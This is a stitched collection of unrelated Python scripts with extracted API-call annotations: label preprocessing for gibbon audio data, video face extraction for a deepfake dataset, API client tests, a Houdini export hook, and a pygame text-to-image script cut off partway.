"forest.binary_trees.single_threaded_binary_trees.LeftThreadedBinaryTree",
"forest.binary_trees.single_threaded_binary_trees.RightThreadedBinaryTree"
] |
[((354, 407), 'forest.binary_trees.single_threaded_binary_trees.LeftThreadedBinaryTree', 'single_threaded_binary_trees.LeftThreadedBinaryTree', ([], {}), '()\n', (405, 407), False, 'from forest.binary_trees import single_threaded_binary_trees\n'), ((434, 488), 'forest.binary_trees.single_threaded_binary_trees.RightThreadedBinaryTree', 'single_threaded_binary_trees.RightThreadedBinaryTree', ([], {}), '()\n', (486, 488), False, 'from forest.binary_trees import single_threaded_binary_trees\n')]
|
import os
import numpy as np
import pandas as pd
'''This script is for preprocessing the label, finding the mistake in it and stroe label in a unified format in processed_label dic'''
file_dic_Extra = os.listdir('../../label/Extra_Labels')
file_dic_Train = os.listdir('../../label/Train_labels')
file_dic_Test = os.listdir('../../label/Test_labels')
#store the gibbon call duration distribution
duration_dist = np.array([])
duration_dist2 = np.array([])
for file_name in file_dic_Extra: # go through the Extra_Labels dictionary
if file_name[0] == 'g':
gibbon_timestamps = pd.read_csv('../../label/Extra_Labels/' + file_name, sep=',')
duration = np.asarray(gibbon_timestamps['Duration'])
duration_dist = np.concatenate((duration_dist, duration), axis = 0)
# test the whether the duration equals to 'end' - 'start'
duration2 = np.asarray(gibbon_timestamps['End'] - gibbon_timestamps['Start'])
duration_dist2 = np.concatenate((duration_dist2, duration2), axis = 0)
if duration.size != 0 :
if min(duration) <= 0:
print(file_name, 'has wrong record')
gibbon_timestamps.to_csv('../../label/processed_label/' + file_name[2:], index = 0)
for file_name in file_dic_Train: # go through the Train_Labels dictionary
if file_name[0] == 'g':
gibbon_timestamps = pd.read_csv('../../label/Train_Labels/' + file_name, sep=',')
duration = np.asarray(gibbon_timestamps['Duration'])
duration_dist = np.concatenate((duration_dist, duration), axis = 0)
# test the whether the duration equals to 'end' - 'start'
duration2 = np.asarray(gibbon_timestamps['End'] - gibbon_timestamps['Start'])
duration_dist2 = np.concatenate((duration_dist2, duration2), axis = 0)
if duration.size != 0:
if min(duration) <= 0:
print(file_name, 'has wrong record')
gibbon_timestamps.to_csv('../../label/processed_label/' + file_name[2:], index = 0)
# result show that duration equals to 'end' - 'start'
test_duration = duration_dist2 == duration_dist
duration_test_result = np.where(test_duration == False)
if duration_test_result[0].size == 0:
print('duration equals to end - star')
else:
print('duration record typo exist')
for file_name in file_dic_Test: # go through the Test_Labels dictionary and save data to processed label dictionary
gibbon_timestamps = pd.read_csv('../../label/Test_Labels/' + file_name, sep=',')
gibbon_timestamps['End'] = gibbon_timestamps['Start'] + gibbon_timestamps['Duration']
gibbon_timestamps = gibbon_timestamps[['Start', 'End', 'Duration']]
if duration.size != 0 :
if min(duration) <= 0:
print(file_name, 'has wrong record')
gibbon_timestamps.to_csv('../../label/processed_label/' + file_name[:-9] + '.data', index = 0)
# g_HGSM3BD_0+1_20160305_060000.data has wrong record
# g_HGSM3AC_0+1_20160312_055400.data has wrong record
# this two file has minus or equals to zero duration because of typo, these error have been fixed in processed-label manually.
|
[
"pandas.read_csv",
"numpy.asarray",
"numpy.where",
"numpy.array",
"os.listdir",
"numpy.concatenate"
] |
[((203, 241), 'os.listdir', 'os.listdir', (['"""../../label/Extra_Labels"""'], {}), "('../../label/Extra_Labels')\n", (213, 241), False, 'import os\n'), ((259, 297), 'os.listdir', 'os.listdir', (['"""../../label/Train_labels"""'], {}), "('../../label/Train_labels')\n", (269, 297), False, 'import os\n'), ((314, 351), 'os.listdir', 'os.listdir', (['"""../../label/Test_labels"""'], {}), "('../../label/Test_labels')\n", (324, 351), False, 'import os\n'), ((414, 426), 'numpy.array', 'np.array', (['[]'], {}), '([])\n', (422, 426), True, 'import numpy as np\n'), ((444, 456), 'numpy.array', 'np.array', (['[]'], {}), '([])\n', (452, 456), True, 'import numpy as np\n'), ((2134, 2166), 'numpy.where', 'np.where', (['(test_duration == False)'], {}), '(test_duration == False)\n', (2142, 2166), True, 'import numpy as np\n'), ((2435, 2495), 'pandas.read_csv', 'pd.read_csv', (["('../../label/Test_Labels/' + file_name)"], {'sep': '""","""'}), "('../../label/Test_Labels/' + file_name, sep=',')\n", (2446, 2495), True, 'import pandas as pd\n'), ((588, 649), 'pandas.read_csv', 'pd.read_csv', (["('../../label/Extra_Labels/' + file_name)"], {'sep': '""","""'}), "('../../label/Extra_Labels/' + file_name, sep=',')\n", (599, 649), True, 'import pandas as pd\n'), ((669, 710), 'numpy.asarray', 'np.asarray', (["gibbon_timestamps['Duration']"], {}), "(gibbon_timestamps['Duration'])\n", (679, 710), True, 'import numpy as np\n'), ((735, 784), 'numpy.concatenate', 'np.concatenate', (['(duration_dist, duration)'], {'axis': '(0)'}), '((duration_dist, duration), axis=0)\n', (749, 784), True, 'import numpy as np\n'), ((873, 938), 'numpy.asarray', 'np.asarray', (["(gibbon_timestamps['End'] - gibbon_timestamps['Start'])"], {}), "(gibbon_timestamps['End'] - gibbon_timestamps['Start'])\n", (883, 938), True, 'import numpy as np\n'), ((964, 1015), 'numpy.concatenate', 'np.concatenate', (['(duration_dist2, duration2)'], {'axis': '(0)'}), '((duration_dist2, duration2), axis=0)\n', (978, 1015), True, 'import numpy as np\n'), ((1365, 1426), 'pandas.read_csv', 'pd.read_csv', (["('../../label/Train_Labels/' + file_name)"], {'sep': '""","""'}), "('../../label/Train_Labels/' + file_name, sep=',')\n", (1376, 1426), True, 'import pandas as pd\n'), ((1446, 1487), 'numpy.asarray', 'np.asarray', (["gibbon_timestamps['Duration']"], {}), "(gibbon_timestamps['Duration'])\n", (1456, 1487), True, 'import numpy as np\n'), ((1512, 1561), 'numpy.concatenate', 'np.concatenate', (['(duration_dist, duration)'], {'axis': '(0)'}), '((duration_dist, duration), axis=0)\n', (1526, 1561), True, 'import numpy as np\n'), ((1650, 1715), 'numpy.asarray', 'np.asarray', (["(gibbon_timestamps['End'] - gibbon_timestamps['Start'])"], {}), "(gibbon_timestamps['End'] - gibbon_timestamps['Start'])\n", (1660, 1715), True, 'import numpy as np\n'), ((1741, 1792), 'numpy.concatenate', 'np.concatenate', (['(duration_dist2, duration2)'], {'axis': '(0)'}), '((duration_dist2, duration2), axis=0)\n', (1755, 1792), True, 'import numpy as np\n')]
|
import shutil, os, glob
import pandas as pd
for ratio in [0, 5, 10, 20, 30, 40, 50, 60, 70, 80, 90, 95, 100]:
metafile = 'partitionmeta/meta' + str(ratio) + '.csv'
df = pd.read_csv(metafile, index_col = 'docid')
for i in df.index:
if df.loc[i, 'tags'] != 'random':
continue
outpath = 'mix/' + str(ratio) + '/' + i + '.tsv'
shutil.copyfile('../data/' + i + '.tsv', outpath)
|
[
"pandas.read_csv",
"shutil.copyfile"
] |
[((178, 218), 'pandas.read_csv', 'pd.read_csv', (['metafile'], {'index_col': '"""docid"""'}), "(metafile, index_col='docid')\n", (189, 218), True, 'import pandas as pd\n'), ((372, 421), 'shutil.copyfile', 'shutil.copyfile', (["('../data/' + i + '.tsv')", 'outpath'], {}), "('../data/' + i + '.tsv', outpath)\n", (387, 421), False, 'import shutil, os, glob\n')]
|
import os
import cv2
from concurrent.futures import ProcessPoolExecutor
import torch
from facenet_pytorch import MTCNN
from tqdm import tqdm
from PIL import Image
import pickle
from face_detection import RetinaFace
from bisect import bisect_left
from collections import Counter
import math
def delete_folders():
"""Deletes the frames folder from each directory in folder_list"""
from shutil import rmtree
for f in folder_list:
folder_to_delete = os.path.join(f, "frames")
rmtree(folder_to_delete)
def create_folders():
"""
Creates a folder called frames in each directory and creates subfolders for
each video in the frames folder.
"""
for f in folder_list:
os.mkdir(os.path.join(f, "frames"))
for fil in os.listdir(f):
fil = fil.split(".")[0]
if fil != "metadata" and fil != "frames":
os.mkdir(os.path.join(f, "frames", fil))
def convert_video_to_frames(input_path, output_folder):
"""Extract all frames from a video"""
count = 0
cap = cv2.VideoCapture(input_path)
while cap.isOpened():
ret, frame = cap.read()
if not ret:
break
cv2.imwrite(os.path.join(output_folder, f"frame_{count}.png"), frame)
count += 1
cap.release()
def find_max_face(input_image):
"""
Finds face in input_image with maximum confidence and returns it
Adds padding of 15px around face
"""
detection = cv.detect_face(input_image)
if detection is not None:
faces, confidences = detection
if confidences:
max_conf = max(confidences)
face = faces[confidences.index(max_conf)]
(startX, startY) = face[0], face[1]
(endX, endY) = face[2], face[3]
height, width, _ = input_image.shape
y_top = max(startY - 15, 0)
x_top = max(startX - 15, 0)
y_bot = min(endY + 15, height)
x_bot = min(endX + 15, width)
return input_image[y_top:y_bot, x_top:x_bot]
return None
def convert_video_to_frames_periodic(name_prefix, input_path, output_folder, dt):
"""Captures a frame every dt milliseconds"""
count = 0
cap = cv2.VideoCapture(input_path)
success, image = cap.read()
while success:
cap.set(cv2.CAP_PROP_POS_MSEC, (count * dt))
success, frame = cap.read()
cv2.imwrite(os.path.join(output_folder, f"{name_prefix}_frame_{count}.png"), frame)
count += 1
cap.release()
def convert_video_to_face_frames_periodic(name_prefix, input_path, output_folder, dt):
"""Captures a frame and tries to detect and save a face in it every dt milliseconds"""
count = 0
num_face = 0
cap = cv2.VideoCapture(input_path)
success, image = cap.read()
while success:
cap.set(cv2.CAP_PROP_POS_MSEC, (count * dt))
success, frame = cap.read()
face = find_max_face(frame)
if face is not None:
cv2.imwrite(os.path.join(output_folder, f"{name_prefix}_face_{num_face}.png"), face)
num_face += 1
count += 1
if num_face < 5:
print(name_prefix + f" has {num_face} faces")
cap.release()
def create_frames(executor):
for f in folder_list:
print(f"In folder {f}")
for video in os.listdir(f):
if video != "metadata.json" and video != "frames":
# print(f"Processing video {video}")
input_path = os.path.join(f, video)
video_folder = video.split(".")[0]
output_folder = os.path.join(f, "frames", video_folder)
executor.submit(convert_video_to_face_frames_periodic, video_folder, input_path, output_folder, 1000)
# convert_video_to_face_frames_periodic(video_folder, input_path, output_folder, 800)
def convert_with_mtcnn_parallel(detector, base_folder, folder):
print(folder)
def func(video):
return convert_video_to_frames_per_frame(os.path.join(folder, video), 10)
video_list = os.listdir(folder)
video_list.remove("metadata.json")
video_list.remove("frames")
video_list.remove("audio")
with ProcessPoolExecutor(20) as pool:
frame_list = pool.map(func, video_list, chunksize=1)
for video, frames in zip(video_list, frame_list):
base_video = video.split(".")[0]
detect_faces_mtcnn_and_save(detector, base_folder, base_video, frames)
def get_frame_count(cap):
num_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
return num_frames
def get_exact_frames(cap, frame_indices):
"""Gets all frames with the indices in frame indices (0 based)"""
frames = []
for index in frame_indices:
cap.set(cv2.CAP_PROP_POS_FRAMES, index)
ret, frame = cap.read()
if ret:
frames.append(frame)
return frames
def get_exact_frames_for_optical_flow(cap, frame_indices):
"""Gets all frames and 4 ahead with the indices in frame indices (0 based)"""
frames = []
index_list = []
for index in frame_indices:
for i in range(4):
idx = index + i
cap.set(cv2.CAP_PROP_POS_FRAMES, idx)
ret, frame = cap.read()
if ret:
image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
height, width, channels = image.shape
image = cv2.resize(image, (width // 2, height // 2), interpolation=cv2.INTER_AREA)
frames.append(image)
index_list.append(idx)
return frames, index_list
def load_model(device):
device = torch.device(device)
detector = MTCNN(device=device, keep_all=True, select_largest=False, post_process=False)
return detector
def mtcnn_detect(detector, frames, path, vid_name):
data = []
def get_dist(px,py,x,y):
return abs(px - x) + abs(py - y)
def get_min_coords(s, x,y):
min_set = max(s, key=lambda k:get_dist(k[0], k[1], x,y))
return min_set[0], min_set[1], min_set[2]
def get_avg_coords(s):
x,y = 0.0,0.0
for dd in s:
px,py,*rest = dd
x += px
y += py
tot = len(s)
return x/tot, y/tot
def add_to_closest_set(x,y,area,bi,bj):
min_dist = float('inf')
idx = -1
for i, s in enumerate(data):
px,py,pa = get_min_coords(s,x,y)
dist = get_dist(px,py,x,y)
areas = sorted([pa, area])
if dist > 175 or (areas[1] / areas[0]) > 1.3:
continue
if dist < min_dist:
dist = min_dist
idx = i
if idx == -1:
stuff = (x,y,area,bi,bj,)
ss = set()
ss.add(stuff)
data.append(ss)
else:
data[idx].add((x,y,area,bi,bj,))
stored_frames = []
def get_box(face_box, shape, padding=15):
(startX, startY) = int(face_box[0]), int(face_box[1])
(endX, endY) = int(face_box[2]), int(face_box[3])
height, width, _ = shape
y_top = max(startY - padding, 0)
x_top = max(startX - padding, 0)
y_bot = min(endY + padding, height)
x_bot = min(endX + padding, width)
return y_top, y_bot, x_top, x_bot
frames_boxes, frames_confidences = detector.detect([Image.fromarray(x) for x in frames], landmarks=False)
for batch_idx, (frame_boxes, frame_confidences) in enumerate(zip(frames_boxes, frames_confidences)):
frame = frames[batch_idx]
stored_frames.append(frame_boxes)
if (frame_boxes is not None) and (len(frame_boxes) > 0):
frame_locations = []
for j, (face_box, confidence) in enumerate(zip(frame_boxes, frame_confidences)):
(y, yb, x, xb) = get_box(face_box, frame.shape, 0)
area = (yb - y) * (xb - x)
if not data:
stuff = (x,y,area,batch_idx,j,)
ss = set()
ss.add(stuff)
data.append(ss)
else:
add_to_closest_set(x,y,area,batch_idx,j)
count = 0
for i, d in enumerate(data):
if len(d) > 9:
for f in d:
rx,ry,area,i,j = f
frame = frames[i]
box = stored_frames[i][j]
(y, yb, x, xb) = get_box(box, frame.shape, 10)
face_extract = frame[y : yb, x : xb]
pa = f'{path}/{vid_name}_{len(d)}_{count}.png'
cv2.imwrite(pa,cv2.cvtColor(face_extract, cv2.COLOR_RGB2BGR))
count += 1
def convert_video_to_frames_per_frame(capture, per_n):
num_frames = get_frame_count(capture)
frames = []
for i in range(0, num_frames):
ret = capture.grab()
if i % per_n == 0:
ret, image = capture.retrieve()
if ret:
height, width, channels = image.shape
image = cv2.resize(image, (width // 2, height // 2), interpolation=cv2.INTER_AREA)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
frames.append(image)
return frames
def load_model_retina(device):
return RetinaFace(gpu_id=0)
def detect_faces_mtcnn_and_save(detector, base_folder, base_video, frames, filenames=None):
pil_images = [Image.fromarray(frame) for frame in frames]
if filenames is None:
filenames = [os.path.join(base_folder, f"{base_video}_face_{i}.png") for i, _ in enumerate(pil_images)]
faces = detector(pil_images, filenames)
return faces
def convert_video_to_frames_with_mtcnn(detector, base_folder, folder):
print(folder)
for video in tqdm(os.listdir(folder)):
name = video.split(".")
try:
name, extension = name[0], name[1]
except IndexError:
continue
if extension == "mp4":
try:
capture = cv2.VideoCapture(os.path.join(folder, video))
total_frames = get_frame_count(capture)
frame_begin = 10
frame_end = total_frames - 8
begin_indices = [i for i in range(frame_begin, frame_end, total_frames // 4)]
frames, indices = get_exact_frames_for_optical_flow(capture, begin_indices)
new_video_folder = os.path.join(base_folder, name)
os.mkdir(new_video_folder)
filenames = [os.path.join(new_video_folder, f"{name}_face_{i}.png") for i in indices]
detect_faces_mtcnn_and_save(detector, new_video_folder, name, frames, filenames)
capture.release()
except Exception as e:
print(video)
print(e)
continue
if __name__ == "__main__":
# base_folder = "/home/teh_devs/deepfake/raw/test_vids"
"""
Rescaled by 4 need testing
"""
from glob import glob
storage_dir = '/home/teh_devs/deepfake/dataset/revamp'
folder_list = []
print("Doing first 5 folders")
for i in range(0, 5):
folder_list.append(f"/home/teh_devs/deepfake/raw/dfdc_train_part_{i}")
detector = load_model(device="cuda:0")
# f = '/home/teh_devs/deepfake/raw/dfdc_train_part_4/srqogltgnx.mp4'
for f in folder_list:
print(f)
videos = glob(f + '/*.mp4')
for vid in tqdm(videos, ncols=0):
try:
vid_name = vid.split('/')[-1].split('.')[0]
capture = cv2.VideoCapture(vid)
frames = convert_video_to_frames_per_frame(capture, 10)
new_folder = os.path.join(storage_dir, vid_name)
os.mkdir(new_folder)
mtcnn_detect(detector, frames, new_folder, vid_name)
capture.release()
except Exception as e:
print(e)
# for f in folder_list:
# convert_video_to_frames_with_mtcnn(detector, base_folder, f)
|
[
"os.mkdir",
"tqdm.tqdm",
"face_detection.RetinaFace",
"cv2.cvtColor",
"concurrent.futures.ProcessPoolExecutor",
"cv2.VideoCapture",
"PIL.Image.fromarray",
"glob.glob",
"facenet_pytorch.MTCNN",
"torch.device",
"shutil.rmtree",
"os.path.join",
"os.listdir",
"cv2.resize"
] |
[((1059, 1087), 'cv2.VideoCapture', 'cv2.VideoCapture', (['input_path'], {}), '(input_path)\n', (1075, 1087), False, 'import cv2\n'), ((2226, 2254), 'cv2.VideoCapture', 'cv2.VideoCapture', (['input_path'], {}), '(input_path)\n', (2242, 2254), False, 'import cv2\n'), ((2745, 2773), 'cv2.VideoCapture', 'cv2.VideoCapture', (['input_path'], {}), '(input_path)\n', (2761, 2773), False, 'import cv2\n'), ((4056, 4074), 'os.listdir', 'os.listdir', (['folder'], {}), '(folder)\n', (4066, 4074), False, 'import os\n'), ((5605, 5625), 'torch.device', 'torch.device', (['device'], {}), '(device)\n', (5617, 5625), False, 'import torch\n'), ((5641, 5718), 'facenet_pytorch.MTCNN', 'MTCNN', ([], {'device': 'device', 'keep_all': '(True)', 'select_largest': '(False)', 'post_process': '(False)'}), '(device=device, keep_all=True, select_largest=False, post_process=False)\n', (5646, 5718), False, 'from facenet_pytorch import MTCNN\n'), ((9213, 9233), 'face_detection.RetinaFace', 'RetinaFace', ([], {'gpu_id': '(0)'}), '(gpu_id=0)\n', (9223, 9233), False, 'from face_detection import RetinaFace\n'), ((468, 493), 'os.path.join', 'os.path.join', (['f', '"""frames"""'], {}), "(f, 'frames')\n", (480, 493), False, 'import os\n'), ((502, 526), 'shutil.rmtree', 'rmtree', (['folder_to_delete'], {}), '(folder_to_delete)\n', (508, 526), False, 'from shutil import rmtree\n'), ((773, 786), 'os.listdir', 'os.listdir', (['f'], {}), '(f)\n', (783, 786), False, 'import os\n'), ((3324, 3337), 'os.listdir', 'os.listdir', (['f'], {}), '(f)\n', (3334, 3337), False, 'import os\n'), ((4186, 4209), 'concurrent.futures.ProcessPoolExecutor', 'ProcessPoolExecutor', (['(20)'], {}), '(20)\n', (4205, 4209), False, 'from concurrent.futures import ProcessPoolExecutor\n'), ((9346, 9368), 'PIL.Image.fromarray', 'Image.fromarray', (['frame'], {}), '(frame)\n', (9361, 9368), False, 'from PIL import Image\n'), ((9702, 9720), 'os.listdir', 'os.listdir', (['folder'], {}), '(folder)\n', (9712, 9720), False, 'import os\n'), ((11325, 11343), 'glob.glob', 'glob', (["(f + '/*.mp4')"], {}), "(f + '/*.mp4')\n", (11329, 11343), False, 'from glob import glob\n'), ((11363, 11384), 'tqdm.tqdm', 'tqdm', (['videos'], {'ncols': '(0)'}), '(videos, ncols=0)\n', (11367, 11384), False, 'from tqdm import tqdm\n'), ((727, 752), 'os.path.join', 'os.path.join', (['f', '"""frames"""'], {}), "(f, 'frames')\n", (739, 752), False, 'import os\n'), ((1204, 1253), 'os.path.join', 'os.path.join', (['output_folder', 'f"""frame_{count}.png"""'], {}), "(output_folder, f'frame_{count}.png')\n", (1216, 1253), False, 'import os\n'), ((2415, 2478), 'os.path.join', 'os.path.join', (['output_folder', 'f"""{name_prefix}_frame_{count}.png"""'], {}), "(output_folder, f'{name_prefix}_frame_{count}.png')\n", (2427, 2478), False, 'import os\n'), ((4005, 4032), 'os.path.join', 'os.path.join', (['folder', 'video'], {}), '(folder, video)\n', (4017, 4032), False, 'import os\n'), ((7338, 7356), 'PIL.Image.fromarray', 'Image.fromarray', (['x'], {}), '(x)\n', (7353, 7356), False, 'from PIL import Image\n'), ((9437, 9492), 'os.path.join', 'os.path.join', (['base_folder', 'f"""{base_video}_face_{i}.png"""'], {}), "(base_folder, f'{base_video}_face_{i}.png')\n", (9449, 9492), False, 'import os\n'), ((3003, 3068), 'os.path.join', 'os.path.join', (['output_folder', 'f"""{name_prefix}_face_{num_face}.png"""'], {}), "(output_folder, f'{name_prefix}_face_{num_face}.png')\n", (3015, 3068), False, 'import os\n'), ((3484, 3506), 'os.path.join', 'os.path.join', (['f', 'video'], {}), '(f, video)\n', (3496, 3506), False, 'import os\n'), ((3590, 3629), 'os.path.join', 'os.path.join', (['f', '"""frames"""', 'video_folder'], {}), "(f, 'frames', video_folder)\n", (3602, 3629), False, 'import os\n'), ((5268, 5306), 'cv2.cvtColor', 'cv2.cvtColor', (['frame', 'cv2.COLOR_BGR2RGB'], {}), '(frame, cv2.COLOR_BGR2RGB)\n', (5280, 5306), False, 'import cv2\n'), ((5385, 5459), 'cv2.resize', 'cv2.resize', (['image', '(width // 2, height // 2)'], {'interpolation': 'cv2.INTER_AREA'}), '(image, (width // 2, height // 2), interpolation=cv2.INTER_AREA)\n', (5395, 5459), False, 'import cv2\n'), ((8977, 9051), 'cv2.resize', 'cv2.resize', (['image', '(width // 2, height // 2)'], {'interpolation': 'cv2.INTER_AREA'}), '(image, (width // 2, height // 2), interpolation=cv2.INTER_AREA)\n', (8987, 9051), False, 'import cv2\n'), ((9076, 9114), 'cv2.cvtColor', 'cv2.cvtColor', (['image', 'cv2.COLOR_BGR2RGB'], {}), '(image, cv2.COLOR_BGR2RGB)\n', (9088, 9114), False, 'import cv2\n'), ((10340, 10371), 'os.path.join', 'os.path.join', (['base_folder', 'name'], {}), '(base_folder, name)\n', (10352, 10371), False, 'import os\n'), ((10388, 10414), 'os.mkdir', 'os.mkdir', (['new_video_folder'], {}), '(new_video_folder)\n', (10396, 10414), False, 'import os\n'), ((11489, 11510), 'cv2.VideoCapture', 'cv2.VideoCapture', (['vid'], {}), '(vid)\n', (11505, 11510), False, 'import cv2\n'), ((11612, 11647), 'os.path.join', 'os.path.join', (['storage_dir', 'vid_name'], {}), '(storage_dir, vid_name)\n', (11624, 11647), False, 'import os\n'), ((11664, 11684), 'os.mkdir', 'os.mkdir', (['new_folder'], {}), '(new_folder)\n', (11672, 11684), False, 'import os\n'), ((903, 933), 'os.path.join', 'os.path.join', (['f', '"""frames"""', 'fil'], {}), "(f, 'frames', fil)\n", (915, 933), False, 'import os\n'), ((8555, 8600), 'cv2.cvtColor', 'cv2.cvtColor', (['face_extract', 'cv2.COLOR_RGB2BGR'], {}), '(face_extract, cv2.COLOR_RGB2BGR)\n', (8567, 8600), False, 'import cv2\n'), ((9954, 9981), 'os.path.join', 'os.path.join', (['folder', 'video'], {}), '(folder, video)\n', (9966, 9981), False, 'import os\n'), ((10444, 10498), 'os.path.join', 'os.path.join', (['new_video_folder', 'f"""{name}_face_{i}.png"""'], {}), "(new_video_folder, f'{name}_face_{i}.png')\n", (10456, 10498), False, 'import os\n')]
|
import unittest
import warnings
from pybt.system import System
from pybt.exceptions import InvalidAPIKey
from .config import CONFIG
class ClientTestCase(unittest.TestCase):
def setUp(self):
warnings.simplefilter('ignore', ResourceWarning)
self.api = System(CONFIG.get("panel_address"), CONFIG.get("api_key"))
def test_api_key_error(self):
with self.assertRaises(InvalidAPIKey):
api_err_key = System(CONFIG.get("panel_address"), "somewords"+CONFIG.get("api_key"))
api_err_key.get_system_total()
def test_get_system_total(self):
self.assertIsInstance(self.api.get_system_total(), dict)
self.assertIn("system", self.api.get_system_total())
self.assertIn("version", self.api.get_system_total())
def test_get_disk_info(self):
self.assertIsInstance(self.api.get_disk_info(), list)
self.assertIn("filesystem", self.api.get_disk_info()[0])
self.assertIn("type", self.api.get_disk_info()[0])
def test_get_net_work(self):
self.assertIsInstance(self.api.get_net_work(), dict)
self.assertIn("network", self.api.get_net_work())
def test_get_task_count(self):
self.assertIsInstance(self.api.get_task_count(), int)
def test_update_panel(self):
self.assertIsInstance(self.api.update_panel(), dict)
self.assertIn("status", self.api.update_panel())
self.assertIn("version", self.api.update_panel().get('msg'))
|
[
"warnings.simplefilter"
] |
[((205, 253), 'warnings.simplefilter', 'warnings.simplefilter', (['"""ignore"""', 'ResourceWarning'], {}), "('ignore', ResourceWarning)\n", (226, 253), False, 'import warnings\n')]
|
# coding: utf-8
# Author: <NAME>
# Contact: <EMAIL>
# Python modules
import traceback
import os
import logging
logger = logging.getLogger(__name__)
# Wizard modules
from houdini_wizard import wizard_tools
from houdini_wizard import wizard_export
# Houdini modules
def main():
scene = wizard_export.save_or_save_increment()
try:
out_nodes_dic = {'wizard_modeling_output_LOD1':'LOD1',
'wizard_modeling_output_LOD2':'LOD2',
'wizard_modeling_output_LOD3':'LOD3'}
for out_node_name in out_nodes_dic.keys():
if wizard_tools.check_out_node_existence(out_node_name):
export_name = out_nodes_dic[out_node_name]
wizard_export.trigger_before_export_hook('modeling')
wizard_export.export(stage_name='modeling', export_name=export_name, out_node=out_node_name)
except:
logger.error(str(traceback.format_exc()))
finally:
wizard_export.reopen(scene)
|
[
"houdini_wizard.wizard_export.save_or_save_increment",
"houdini_wizard.wizard_export.reopen",
"houdini_wizard.wizard_tools.check_out_node_existence",
"houdini_wizard.wizard_export.trigger_before_export_hook",
"traceback.format_exc",
"houdini_wizard.wizard_export.export",
"logging.getLogger"
] |
[((121, 148), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (138, 148), False, 'import logging\n'), ((293, 331), 'houdini_wizard.wizard_export.save_or_save_increment', 'wizard_export.save_or_save_increment', ([], {}), '()\n', (329, 331), False, 'from houdini_wizard import wizard_export\n'), ((960, 987), 'houdini_wizard.wizard_export.reopen', 'wizard_export.reopen', (['scene'], {}), '(scene)\n', (980, 987), False, 'from houdini_wizard import wizard_export\n'), ((586, 638), 'houdini_wizard.wizard_tools.check_out_node_existence', 'wizard_tools.check_out_node_existence', (['out_node_name'], {}), '(out_node_name)\n', (623, 638), False, 'from houdini_wizard import wizard_tools\n'), ((715, 767), 'houdini_wizard.wizard_export.trigger_before_export_hook', 'wizard_export.trigger_before_export_hook', (['"""modeling"""'], {}), "('modeling')\n", (755, 767), False, 'from houdini_wizard import wizard_export\n'), ((784, 880), 'houdini_wizard.wizard_export.export', 'wizard_export.export', ([], {'stage_name': '"""modeling"""', 'export_name': 'export_name', 'out_node': 'out_node_name'}), "(stage_name='modeling', export_name=export_name,\n out_node=out_node_name)\n", (804, 880), False, 'from houdini_wizard import wizard_export\n'), ((914, 936), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (934, 936), False, 'import traceback\n')]
|
#! /usr/bin/python
# -*- coding: utf-8 -*-
'''
# 使用 convert(ImageMagick) 转换png为gif图片:
ls |sed 's/\(.*\).png/convert \1.png -flatten -channel A -threshold 0% \1.gif/g'
# cx-freeze打包:
Python setup.py build
Python setup.py bdist_msi
'''
from os import mkdir
from os import walk
from os import path
from os import getcwd
import sys
from math import floor
from codecs import open
# from pathlib import Path
# from inspect import getsourcefile
# from os.path import abspath
import pygame
def AAfilledRoundedRect(surface,rect,color,radius=0.4):
"""
AAfilledRoundedRect(surface,rect,color,radius=0.4)
surface : destination
rect : rectangle
color : rgb or rgba
radius : 0 <= radius <= 1
"""
rect = pygame.Rect(rect)
color = pygame.Color(*color)
alpha = color.a
color.a = 0
pos = rect.topleft
rect.topleft = 0,0
rectangle = pygame.Surface(rect.size,pygame.SRCALPHA)
circle = pygame.Surface([min(rect.size)*3]*2,pygame.SRCALPHA)
pygame.draw.ellipse(circle,(0,0,0),circle.get_rect(),0)
circle = pygame.transform.smoothscale(circle,[int(min(rect.size)*radius)]*2)
radius = rectangle.blit(circle,(0,0))
radius.bottomright = rect.bottomright
rectangle.blit(circle,radius)
radius.topright = rect.topright
rectangle.blit(circle,radius)
radius.bottomleft = rect.bottomleft
rectangle.blit(circle,radius)
rectangle.fill((0,0,0),rect.inflate(-radius.w,0))
rectangle.fill((0,0,0),rect.inflate(0,-radius.h))
rectangle.fill(color,special_flags=pygame.BLEND_RGBA_MAX)
rectangle.fill((255,255,255,alpha),special_flags=pygame.BLEND_RGBA_MIN)
return surface.blit(rectangle,pos)
def splitByLen(string, width):
return [string[x:x+width] for x in range(0, len(string), width)]
def generate_pic(hasBackgroud, frontColor):
# import os.path
# try:
# dir_path = os.path.dirname(os.path.abspath(__file__))
# except NameError: # We are the main py2exe script, not a module
# import sys
# dir_path = os.path.dirname(os.path.abspath(sys.argv[0]))
# dir_path = path.dirname(path.realpath(__file__))
# dir_path = Path(__file__).parent
# dir_path = abspath(getsourcefile(lambda:0))
# if getattr(sys, 'text2img', False):
# # The application is frozen
# dir_path = path.dirname(sys.executable)
# Print("found install path:" + dir_path)
path_prefix = getcwd()
pygame.init()
fontPath = path.join(path_prefix, "fonts\\")
text = u'获取测试文本长度哈哈'
line_len = len(text)
fontSize = 15
fontHeight = 200 # 35 40 50 # 单字高度 越大字越清
fontEdge = 0.25 # 图片边距
picEdge = 1600 # 240 # 图片边长 单行字数 = picEdge/fontHeight
dst_scale = 240/picEdge
width_plus = fontHeight * fontEdge
height_plus = fontHeight * fontEdge
radius_default = 0.5
color_white = (255, 255, 255, 255)
color_gray = (204, 204, 204, 255)
color_black = (0, 0, 0, 0)
isSmoooth = True
if hasBackgroud:
color_bg = color_gray
color_fg = frontColor
image_bg = "-bg"
else:
color_bg = None
color_fg = color_black
image_bg = ""
imagePath = path.join(path_prefix, "images\\")
Print(u"图片将生成在目录:\t\t\t\t\t" + imagePath)
mkdir(imagePath) if not path.exists(imagePath) else None
input_file = path.join(path_prefix,"1.txt")
if not path.exists(input_file):
Print(u"[退出]当前目录无文件:\t\t\t\t" + input_file)
return
else:
Print(u"以文件内容为输入:\t\t\t\t\t" + input_file)
if not path.exists(fontPath):
Print(u"[退出]未找到字体:\t\t\t\t\t" + fontPath)
return
else:
Print(u"搜索字体:\t\t\t\t\t\t\t" + fontPath)
for _,_,filenames in walk(path.join(fontPath)):
fontCount = 0
for filename in filenames:
font = pygame.font.Font(path.join("fonts", filename), fontSize)
_rtext = font.render(text, isSmoooth, color_fg, color_bg)
_width, _height = _rtext.get_size()
while _height < fontHeight:
fontSize += 1
